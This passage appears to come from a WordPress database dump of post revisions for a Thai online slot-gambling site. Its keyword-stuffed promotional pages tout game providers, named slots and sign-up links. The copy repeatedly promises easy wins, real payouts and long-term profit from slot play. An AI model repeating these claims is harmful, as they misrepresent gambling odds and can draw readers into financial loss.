ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-03-02 08:28:29','2026-03-02 08:28:29','',44,'https://amb18slot.com/?p=418',0,'revision','',0),(419,3,'2026-03-02 08:29:41','2026-03-02 08:29:41','<!-- wp:image {\"id\":370,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-goodweb-bonus-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก ง่าย ล่าสุด\" class=\"wp-image-370\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด</strong> เว็บดีมีคุณภาพรวมเกมดังระดับโลก โบนัสแตก เล่นสบาย ระบบลื่น จ่ายจริงทุกยอดถอน อัปเดตใหม่ปีนี้แน่นอนว่าเป็นโลกของสายปั่นยุคใหม่ไม่เหมือนเดิมอีกต่อไป เพราะผู้เล่นต้องการมากกว่าแค่ภาพสวยหรือเอฟเฟกต์จัดเต็ม แต่ต้องการระบบที่ลื่นไหล ปลอดภัย และให้ผลตอบแทนคุ้มค่า <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> จึงกลายเป็นตัวเลือกที่ถูกพูดถึงในกลุ่มนักเดิมพันออนไลน์ ด้วยจุดเด่นเรื่องเกมลิขสิทธิ์แท้ ระบบเสถียรและโบนัสที่แจกแบบไม่มีกั๊ก บรรยากาศการเล่นถูกออกแบบมาให้เข้าถึงง่ายมือใหม่เข้าใจได้ไม่ยาก ส่วนสายโปรก็สามารถวางแผนเดิมพันได้แบบจริงจัง ทุกองค์ประกอบถูกพัฒนาให้ตอบโจทย์ทั้งความสนุกและโอกาสทำกำไรในระยะยาว ใครที่กำลังมองหาเว็บที่ครบเครื่องทั้งความมันส์และความคุ้มบอกเลยว่าที่นี่ตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด แหล่งรวมเกมแบรนด์แท้ เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ถ้าพูดถึงการรวมค่ายเกมระดับอินเตอร์ <strong> เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong> ถือว่าโดดเด่นในเรื่องความหลากหลาย เกมทั้งหมดเป็นแบรนด์แท้จากผู้พัฒนาชื่อดังที่ได้รับการยอมรับในตลาดต่างประเทศ ระบบหลังบ้านมีมาตรฐานความปลอดภัยสูง ทำให้ผู้เล่นมั่นใจได้ว่าทุกการหมุนมีความโปร่งใส ไม่ใช่เว็บลอกหรือดัดแปลงตัวเกมให้เสียสมดุล จุดแข็งอีกอย่างคืออัตราการจ่ายที่ค่อนข้างสูง หลายเกมมีค่า RTP อยู่ในระดับที่น่าสนใจ ส่งผลให้โอกาสแตกหนักมีให้เห็นจริง สำหรับใครที่ชอบฟีลเกมต่างประเทศ ภาพสวย ธีมชัด ฟีเจอร์จัดเต็ม ที่นี่คือศูนย์รวมที่ตอบโจทย์ครบทั้งสายชิลและสายลุย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด สุดยอด เว็บดีคุณภาพ ที่มาพร้อมค่ายเกมเบอร์ต้น ๆ ระดับเอเชีย </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ความแข็งแกร่งของ <strong>เว็บ ตรง แตก ง่าย ล่าสุด</strong> ไม่ได้มีแค่เกมฝั่งยุโรปหรืออเมริกาเท่านั้น แต่ยังรวบรวมค่ายเกมเบอร์ต้นของเอเชียที่ได้รับความนิยมสูงถือว่าเป็นเว็บดีที่น่าสนใจอีกเว็บที่มาพร้อมระบบกราฟิกมีความละเอียด ภาพคม สีสด เสียงประกอบเร้าอารมณ์ ทำให้ทุกการหมุนมีชีวิตชีวา จุดเด่นคือการออกแบบฟีเจอร์ที่เข้าใจพฤติกรรมผู้เล่นในภูมิภาคนี้ ไม่ว่าจะเป็นโบนัสสะสม ตัวคูณรางวัล หรือสัญลักษณ์พิเศษที่เพิ่มโอกาสทำกำไร ทุกค่ายผ่านการคัดสรรอย่างพิถีพิถัน จึงมั่นใจได้ว่าเกมที่เปิดให้บริการมีคุณภาพจริงไม่มีเกมเกรดรองปะปน ใครที่อยากสัมผัสมาตรฐานระดับเอเชียแบบครบเครื่องเว็บนี้คือคำตอบที่ลงตัว</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด ค่าย Pragmatic Play รวมสุดยอดสล็อต มาตรฐานระดับโลก </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อพูดถึงค่ายระดับโลกอย่าง Pragmatic Play หลายคนย่อมคุ้นชื่อกันดีเพราะว่าทางเว็บได้นำเกมยอดฮิตจากค่ายนี้มาให้เลือกครบแทบทุกแนว ไม่ว่าจะเป็นธีมผจญภัย แฟนตาซี หรือแนวคลาสสิก จุดเด่นของค่ายนี้คือระบบตัวคูณที่เพิ่มความตื่นเต้นทุกครั้งที่วงล้อเรียงสัญลักษณ์ได้ตามเงื่อนไข อีกทั้งยังมีฟีเจอร์ฟรีสปินที่เปิดโอกาสให้ผู้เล่นลุ้นรางวัลใหญ่โดยไม่ต้องเพิ่มทุนมากเกินไป มาตรฐานเกมถูกพัฒนาอย่างต่อเนื่อง ทำให้ประสบการณ์เล่นมีความลื่นไหล และรองรับทั้งมือถือและคอมพิวเตอร์แบบไม่มีสะดุด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Play’n GO ปั่นสนุก จ่ายจริง ทุกจังหวะ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งค่ายที่สร้างชื่อในวงการสล็อตคือ Play\'n GO ซึ่งขึ้นชื่อเรื่องการออกแบบเกมที่มีเอกลักษณ์ ภาพสวย และเนื้อเรื่องชัดเจน เกมจากค่ายนี้ในระบบของเว็บถูกปรับให้เหมาะกับผู้เล่นไทย โหลดเร็ว ไม่กินทรัพยากรเครื่องมาก จุดแข็งคือระบบโบนัสที่แจกแบบมีชั้นเชิง บางเกมมีฟีเจอร์รีสปินหรือสัญลักษณ์พิเศษที่เพิ่มอัตราการจ่าย ทำให้ทุกจังหวะการหมุนมีโอกาสพลิกสถานการณ์ได้เสมอ ใครที่ชอบเกมที่มีความสร้างสรรค์สูง และมีความท้าทายด้านกลยุทธ์ ค่ายนี้ตอบโจทย์แบบครบเครื่อง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Relax Gaming แล้วคุณจะรู้ว่าความพิเศษคืออะไร</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับสายที่มองหาอะไรแตกต่าง Relax Gaming คืออีกตัวเลือกที่ไม่ควรมองข้าม เกมของค่ายนี้มีดีไซน์ทันสมัย พร้อมกลไกพิเศษที่ไม่เหมือนใคร หลายเกมใช้ระบบ Megaways หรือฟีเจอร์ผสมผสานที่เพิ่มความหลากหลายของเพย์ไลน์ ทำให้รูปแบบการจ่ายรางวัลมีมิติและคาดเดายากยิ่งเพิ่มความลุ้นในทุกการหมุนในการเข้าเล่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตกง่าย ล่าสุด เกมแห่งความสนุก โบนัสแตก ที่สายปั่นควรลองเล่น</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อรวมค่ายดังระดับโลกและเอเชียเข้าไว้ด้วยกัน <strong>สล็อตแตกง่าย ล่าสุด</strong> จึงเต็มไปด้วยเกมคุณภาพที่มีจุดขายชัดเจนทั้งในเรื่องโบนัสแตกง่ายและฟีเจอร์เสริมที่ช่วยเพิ่มโอกาสรับรางวัล ผู้เล่นสามารถเลือกแนวเกมได้ตามสไตล์ไม่ว่าจะเป็นธีมตะวันตก แนวผจญภัย หรือธีมจีนยอดนิยม ทุกเกมถูกคัดมาเพราะมีสถิติการจ่ายดีและได้รับเสียงตอบรับจากผู้เล่นจำนวนมาก ใครที่กำลังมองหาเกมปั่นมันส์ระบบเสถียรและมีโอกาสทำกำไรสูง ที่นี่มีตัวเลือกครบให้ลองแบบจุใจ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild Bandito </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมธีมตะวันตกที่โดดเด่นด้วยภาพสีสันสดและตัวละครคาแรกเตอร์ชัดเจน จุดขายสำคัญคือฟีเจอร์ฟรีสปินพร้อมตัวคูณที่เพิ่มขึ้นตามจำนวนสัญลักษณ์พิเศษที่ปรากฏ ทำให้โอกาสรับรางวัลใหญ่มีความเป็นไปได้สูง เกมนี้เหมาะกับสายที่ชอบความดุดันและจังหวะลุ้นหนัก เพราะทุกการหมุนสามารถเปลี่ยนทุนเล็กให้กลายเป็นกำไรก้อนโตได้ หากบริหารเงินดีและเลือกจังหวะเข้าซื้อฟรีสปินอย่างเหมาะสม โอกาสแตกหนักมีให้เห็นบ่อย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild North </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>มาในธีมแดนหนาวที่เต็มไปด้วยสัตว์ป่าและบรรยากาศหิมะขาว จุดเด่นคือสัญลักษณ์ไวด์ที่สามารถขยายเต็มรีล เพิ่มโอกาสเรียงสัญลักษณ์ชนะได้ง่ายขึ้น เกมนี้มีความผันผวนระดับกลางถึงสูง เหมาะกับผู้เล่นที่ต้องการลุ้นรางวัลก้อนใหญ่ในรอบโบนัส ฟีเจอร์ฟรีสปินช่วยเพิ่มความเร้าใจ เพราะเมื่อเข้าโหมดนี้แล้วอัตราการจ่ายมีแนวโน้มสูงขึ้นอย่างเห็นได้ชัด ถือเป็นอีกเกมที่สายปั่นจริงจังควรลองสัมผัส</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Double Fortune</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมสล็อตธีมจีนที่ได้รับความนิยมสูง จุดแข็งคือระบบตัวคูณสองเท่าเมื่อเข้าโหมดพิเศษ ทำให้เงินรางวัลเพิ่มขึ้นแบบชัดเจน การออกแบบเกมเน้นความเรียบง่าย เข้าใจง่าย มือใหม่สามารถเล่นได้ไม่ซับซ้อน ขณะเดียวกันก็มีศักยภาพในการจ่ายสูงหากสัญลักษณ์เรียงครบตามเงื่อนไข เหมาะกับสายที่ชอบเกมจังหวะไม่เร็วเกินไป แต่มีโอกาสรับรางวัลคุ้มค่าในแต่ละรอบ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตล่าสุด เอาชนะได้ง่าย ด้วยฟรีสปินที่ซื้อได้ พร้อมระบบไวด์ที่ จ่ายจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งจุดแข็งของ <strong>สล็อตล่าสุด </strong>คือระบบซื้อฟรีสปินที่เปิดโอกาสให้ผู้เล่นเข้าสู่รอบโบนัสได้โดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไขฟีเจอร์นี้ช่วยประหยัดเวลาและเพิ่มโอกาสลุ้นรางวัลใหญ่แบบตรงจุด นอกจากนี้ยังมีระบบไวด์ที่ทำหน้าที่แทนสัญลักษณ์อื่นช่วยให้การเรียงสัญลักษณ์ชนะเกิดขึ้นง่ายขึ้น หลายเกมยังมีไวด์แบบขยายรีลหรือไวด์คูณ ทำให้การจ่ายรางวัลมีมูลค่าสูงกว่าเดิมรับรองว่าจ่ายจริง หากใช้กลยุทธ์บริหารทุนควบคู่กันไปการเอาชนะและทำกำไรระยะยาวไม่ใช่เรื่องไกลเกินจริง เลือก <a href=\"https://luca333auto.com/auth/register\"><strong>สมัคร</strong></a> เข้าเล่นที่นี่รับรองว่ามีแต่คุ้มกับคุ้มอย่างแน่นอน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บตรงแตกง่ายล่าสุด เปิดให้ เล่นสบาย มาพร้อมโหมดให้ทดลองเล่นฟรี ก่อนเปิดสกิลเดิมพันจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับผู้เล่นที่ยังไม่มั่นใจในแนวทางการวางแผน <strong>เว็บตรงแตกง่ายล่าสุด</strong> เปิดโหมดทดลองเล่นฟรีให้ใช้งานก่อนลงเงินจริงเพิ่มโอกาสในการเข้าเล่นสามารถที่จะเล่นสบายได้ทุกรอบ ผู้เล่นสามารถเรียนรู้กลไกเกมทดลองฟีเจอร์ และสังเกตจังหวะการจ่ายได้โดยไม่ต้องเสี่ยงทุนจริง โหมดนี้เหมาะมากกับมือใหม่ที่ต้องการฝึกสกิล รวมถึงสายโปรที่อยากทดสอบเกมใหม่ก่อนลงทุน เมื่อเข้าใจรูปแบบการเล่นแล้วค่อยปรับกลยุทธ์ให้เหมาะสมกับงบประมาณของตัวเอง การมีตัวเลือกทดลองเล่นจึงช่วยเพิ่มความมั่นใจและลดความเสี่ยงได้อย่างชัดเจนทำให้ทุกการเดิมพันมีความพร้อมมากยิ่งขึ้น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก ง่าย ล่าสุด เว็บดีโบนัสแตกเล่นสบายจ่ายจริง','','inherit','closed','closed','','414-revision-v1','','','2026-03-02 08:29:41','2026-03-02 08:29:41','',414,'https://amb18slot.com/?p=419',0,'revision','',0),(420,3,'2026-03-02 08:30:45','2026-03-02 08:30:45','<!-- wp:image {\"id\":369,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-2025-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก หนัก 2025\" class=\"wp-image-369\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก หนัก 2025</strong> เว็บเกมคุณภาพระบบไว เกมแตกจริงอัปเดตใหม่กว่า 1,500 รายการ พร้อมฟีเจอร์ซื้อฟรีสปินและค่ายเกมดังครบทุกสไตล์ รับรองว่าเล่นง่ายและกำไรดีเพราะว่าการเข้าเล่นที่นี่คือแพลตฟอร์มเกมสล็อตออนไลน์ที่ตอบโจทย์สายทำกำไรยุคใหม่แบบครบสูตร ทั้งเรื่องความเสถียรของระบบ ความไวในการทำรายการ และคลังเกมที่อัปเดตต่อเนื่องแบบไม่ตกเทรนด์ จุดเด่นสำคัญคือการเป็นเว็บตรงไม่ผ่านเอเย่นต์ ทำให้การเล่นโปร่งใสตรวจสอบได้ และมีโอกาสรับอัตราการจ่ายที่คุ้มค่า ผู้เล่นสามารถเริ่มต้นด้วยงบสบายกระเป๋า พร้อมลุ้นรางวัลใหญ่ได้จริงทุกวัน บรรยากาศการเล่นลื่นไหล ไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์ ใครที่กำลังมองหาเว็บเกมสล็อตที่เน้นแตกจริง จ่ายจริง และสร้างกำไรได้ต่อเนื่องการเข้าเล่นกับทาง <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> ถือว่าเป็นตัวเลือกที่ไม่ควรมองข้าม</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก หนัก 2025 มาพร้อมระบบฝากถอนไว สล็อต แตก ง่าย ทุน น้อย วอ เลท</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>แน่นอนว่าการเข้าเล่นกับทางเว็บเรานั้นให้ความสำคัญกับประสบการณ์ผู้เล่นตั้งแต่วินาทีแรกที่สมัครสมาชิกระบบฝากถอนถูกพัฒนาให้รวดเร็วภายในไม่กี่วินาที รองรับการทำรายการผ่านธนาคารชั้นนำและวอลเลททำให้สายทุนน้อยสามารถบริหารงบได้คล่องตัว ไม่ต้องรอนานจนเสียจังหวะการปั่นเกมสล็อตแตกง่ายหลายเกมถูกออกแบบให้เหมาะกับงบเริ่มต้นหลักสิบถึงหลักร้อยเพิ่มโอกาสทำกำไรแบบค่อยเป็นค่อยไป ระบบอัตโนมัติทำงานตลอดยี่สิบสี่ชั่วโมงลดความผิดพลาด และช่วยให้การเงินปลอดภัยมากขึ้น ใครที่อยากได้เว็บที่ทั้งแตกง่ายและจัดการเงินไว <strong>สล็อต แตก ง่าย ทุน น้อย วอ เลท </strong>จึงตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตกหนัก 2025 เล่นสนุก อัปเดตเกมมากกว่า 1,500 รายการ ทุกเกม กำไรดี</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อตแตกหนัก 2025 </strong>มาพร้อมคลังเกมมากกว่าหนึ่งพันห้าร้อยรายการครอบคลุมทุกธีมตั้งแต่แฟนตาซี เทพเจ้า สัตว์นำโชค ไปจนถึงแนวผจญภัยสุดมัน ทุกเกมถูกคัดสรรจากผู้พัฒนาชั้นนำที่มีมาตรฐานสากล ภาพกราฟิกคมชัด ระบบเสียงเร้าใจ และฟีเจอร์พิเศษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ช่วยเพิ่มโอกาสรับรางวัลไม่ว่าจะเป็นสัญลักษณ์ไวลด์ ตัวคูณ หรือรอบโบนัส เกมส่วนใหญ่มีค่า RTP อยู่ในระดับที่น่าสนใจ ช่วยให้ผู้เล่นมีโอกาสคืนทุนและสร้างกำไรดีได้ในระยะยาวการอัปเดตเกมใหม่เกิดขึ้นต่อเนื่อง ทำให้ไม่มีคำว่าเบื่อสำหรับสายปั่นที่ต้องการประสบการณ์สดใหม่ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตก หนัก 2025 บอกต่อเกมชื่อดัง แตกจริง ที่สายปั่นทุนน้อยต้องมาลอง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>รวมเกมยอดนิยมที่ได้รับกระแสตอบรับดีจากผู้เล่นทั่วเอเชีย 